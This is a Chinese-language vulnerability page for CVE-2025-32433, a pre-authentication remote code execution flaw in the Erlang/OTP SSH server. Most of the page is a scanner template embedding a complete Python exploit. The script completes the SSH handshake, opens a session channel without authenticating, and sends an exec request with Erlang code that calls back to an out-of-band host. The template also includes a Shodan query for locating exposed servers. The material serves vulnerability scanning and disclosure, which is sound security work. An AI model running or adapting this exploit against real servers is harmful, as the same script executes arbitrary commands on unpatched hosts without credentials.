CVE-2025-32433: Erlang/OTP SSH - Remote Code Execution

日期: 2025-08-01 | 影响软件: Erlang/OTP | POC: 已公开

漏洞描述

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials.

PoC代码[已公开]

id: CVE-2025-32433

info:
  name: Erlang/OTP SSH - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,darses
  severity: critical
  description: |
    Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials.
  remediation: |
    This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
  reference:
    - https://platformsecurity.com/blog/CVE-2025-32433-poc
    - https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12
    - https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f
    - https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891
    - https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-32433
    cwe-id: CWE-306
    epss-score: 0.59118
    epss-percentile: 0.98173
  metadata:
    verified: true
    max-request: 1
    shodan-query: "Erlang OTP"
  tags: cve,cve2025,erlang,otp,ssh,rce,oast,kev,vkev

variables:
  OAST: "{{interactsh-url}}"

code:
  - engine:
      - py
      - python3
    source: |
        import socket,os
        import struct
        import time
        import binascii

        HOST = os.getenv('Host')
        PORT = os.getenv('Port')

        def hexdump(data):
            return ' '.join([f'{b:02x}' for b in data])

        def string_payload(s):
            s_bytes = s.encode("utf-8")
            return struct.pack(">I", len(s_bytes)) + s_bytes

        def build_packet(payload):
            padding_length = 8 - ((len(payload) + 5) % 8)
            if padding_length < 4:
                padding_length += 8
            packet_length = len(payload) + padding_length + 1
            packet = (
                struct.pack(">I", packet_length) +
                bytes([padding_length]) +
                payload +
                b"\x00" * padding_length
            )
            return packet

        def build_channel_open(channel_id=0):
            return build_packet(
                b"\x5a" +
                string_payload("session") +
                struct.pack(">I", channel_id) +
                struct.pack(">I", 0x100000) +
                struct.pack(">I", 0x8000) +
                b""
            )

        def build_channel_request(channel_id=0, command=""):
            return build_packet(
                b"\x62" +
                struct.pack(">I", channel_id) +
                string_payload("exec") +
                b"\x01" +
                string_payload(command)
            )

        def build_kexinit():
            cookie = b"\x00" * 16
            kex_algorithms = ["curve25519-sha256@libssh.org", "diffie-hellman-group14-sha1"]
            host_key_algorithms = ["ssh-rsa","rsa-sha2-512","rsa-sha2-256"]
            ciphers = ["aes128-ctr"]
            macs = ["hmac-sha1"]
            compression = ["none"]

            payload = (
                b"\x14" +
                cookie +
                string_payload(",".join(kex_algorithms)) +
                string_payload(",".join(host_key_algorithms)) +
                string_payload(",".join(ciphers)) +
                string_payload(",".join(ciphers)) +
                string_payload(",".join(macs)) +
                string_payload(",".join(macs)) +
                string_payload(",".join(compression)) +
                string_payload(",".join(compression)) +
                string_payload("") +
                string_payload("") +
                b"\x00" +
                struct.pack(">I", 0)
            )
            return build_packet(payload)

        def receive_packet(sock, timeout=5):
            sock.settimeout(timeout)
            try:
                size_data = sock.recv(4)
                if not size_data:
                    return None
                packet_size = struct.unpack(">I", size_data)[0]
                packet = sock.recv(packet_size)
                return packet
            except socket.timeout:
                print("[!] Timeout waiting for response")
                return None
            except Exception as e:
                print(f"[!] Error receiving packet: {e}")
                return None

        try:
            with socket.create_connection((HOST, PORT)) as s:
                print("[*] Connecting to SSH server...")

                # Send initial SSH version with specific version string
                version = b"SSH-2.0-OpenSSH_7.4\r\n"
                s.sendall(version)

                banner = s.recv(1024)
                #print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")

                #print("[*] Sending KEXINIT...")
                s.sendall(build_kexinit())
                response = receive_packet(s)
                if response:
                    print("[+] Received KEXINIT response")

                print("[*] Sending channel_open...")
                s.sendall(build_channel_open())
                response = receive_packet(s)
                if response:
                    print("[+] Channel opened successfully")
                    msg_type = response[1] if len(response) > 1 else None
                time.sleep(1)
                # Try different payload formats
                payloads = [
                    'inet:gethostbyname("' + os.getenv('OAST') + '").'


                ]
                for payload in payloads:
                    print(f"[*] Trying payload: {payload}")
                    s.sendall(build_channel_request(command=payload))
                    response = receive_packet(s)
                    if response:
                        print(f"[+] Response received for payload: {payload}")
                    time.sleep(1)
                print("[*] Exploit attempt completed")

        except Exception as e:
            print(f"[!] Error during exploitation: {e}")

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a00473045022100e1ed3ef12f75ed6bfbc2f6b6f84899303ec44a3d9550f0b3a34e960b4a1f992302202a6ec1f92d9d0c901363e1f76f42adfe59c5ae9192011348db14cf1ac661d54b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐